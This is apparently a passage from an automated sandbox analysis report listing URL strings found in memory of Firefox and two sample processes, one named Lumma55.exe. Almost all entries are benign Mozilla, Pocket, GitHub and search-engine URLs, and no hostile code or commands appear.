Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2809101193.000001DE0BF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000018.00000002.2861243955.000001DE03E30000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2876461251.000001DE04803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2963078467.00003EDE10504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745774413.000001DE03900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2962965308.00003C7712804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000018.00000003.2749210013.000001DE03333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2748847321.000001DE03319000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2840328668.000001DE0332B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.previousHandler.
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000018.00000003.2749210013.000001DE03333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2748847321.000001DE03319000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2840328668.000001DE0332B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2747902475.000001DE03333000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2929242704.000001DE07503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00126000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Parent
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2959855801.00000F9D02A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2929242704.000001DE07503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A802F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabControl
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C073000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morenewtab-section-menu-privacy-notice
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moresection.highlights.includeDownloads
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsConfiguration
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000018.00000002.2833641745.000001DE01003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2809101193.000001DE0BF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000018.00000002.2939078844.000001DE0BF3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000018.00000002.2939078844.000001DE0BF3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000018.00000002.2861243955.000001DE03E30000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745774413.000001DE03900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsresource://builtin-addons/search-detection/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/defaultValueOriginalValue
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2954557391.000001DE74011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881jar:file
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2937893099.000001DE0BE80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01B43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000018.00000002.2946552739.000001DE0E41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A8086000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeVisitedNumber
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
